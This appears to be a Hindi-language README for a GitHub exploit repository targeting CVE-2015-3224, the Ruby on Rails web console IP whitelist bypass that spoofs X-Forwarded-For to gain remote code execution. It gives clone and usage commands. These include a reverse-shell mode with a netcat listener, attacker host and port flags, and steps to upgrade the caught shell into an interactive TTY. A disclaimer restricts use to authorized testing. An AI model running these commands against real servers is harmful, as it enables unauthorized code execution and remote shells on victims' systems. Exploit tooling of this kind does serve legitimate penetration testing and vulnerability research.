
Ruby on Rails Web Console Exploit (CVE-2015-3224)
इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो Ruby on Rails 4.0.x और 4.1.x के डेवलपर वेब कंसोल में IP व्हाइटलिस्ट बायपास भेद्यता का शोषण करती है। यह स्क्रिप्ट कमजोर सर्वरों पर दूरस्थ कोड निष्पादन की अनुमति देती है।
⚠️ अस्वीकरण यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इसे बिना स्पष्ट अनुमति के किसी भी सिस्टम पर उपयोग न करें। लेखक इस स्क्रिप्ट के दुरुपयोग या इसके कारण होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं हैं।
Ruby on Rails के कमजोर संस्करणों में वेब कंसोल विकास उद्देश्यों के लिए है और केवल विश्वसनीय IP पतों से ही सुलभ होना चाहिए। हालांकि, X-Forwarded-For HTTP हेडर के अनुचित हैंडलिंग के कारण, एक हमलावर अपने IP पते को स्पूफ कर सकता है ताकि वह एक विश्वसनीय स्थानीय उपयोगकर्ता (जैसे 127.0.0.1 या ::1) के रूप में दिखाई दे। यह IP व्हाइटलिस्ट को बायपास करता है और वेब कंसोल तक अनधिकृत पहुंच प्रदान करता है, जिससे दूरस्थ कोड निष्पादन होता है।
requests लाइब्रेरीrequests इंस्टॉल करें:
pip install requests
रिपॉजिटरी क्लोन करें:
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <repo-directory>
स्क्रिप्ट को निष्पादन योग्य बनाएं:
chmod +x exploit.py
यह मोड त्वरित, सरल कमांड चलाने के लिए उपयोगी है।
./exploit.py -t http://<TARGET_IP>:<PORT>
यह स्थिर, पूरी तरह से इंटरैक्टिव शेल के लिए अनुशंसित मोड है।
अपनी स्थानीय मशीन पर, एक नया टर्मिनल खोलें और netcat लिसनर प्रारंभ करें।
nc -lvnp 9001
दूसरे टर्मिनल में, --rev-shell फ्लैग के साथ स्क्रिप्ट चलाएं, अपना स्थानीय IP (lhost) और पोर्ट (lport) प्रदान करें।
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
आपके netcat लिसनर पर एक कनेक्शन आएगा। इसे पूरी तरह से इंटरैक्टिव TTY में अपग्रेड करने के लिए, netcat विंडो में इन चरणों का पालन करें:
Ctrl+Z दबाकर।stty raw -echo; fg
Enter दबाएं।reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
अब आपके पास पूरी तरह कार्यात्मक और स्थिर शेल है!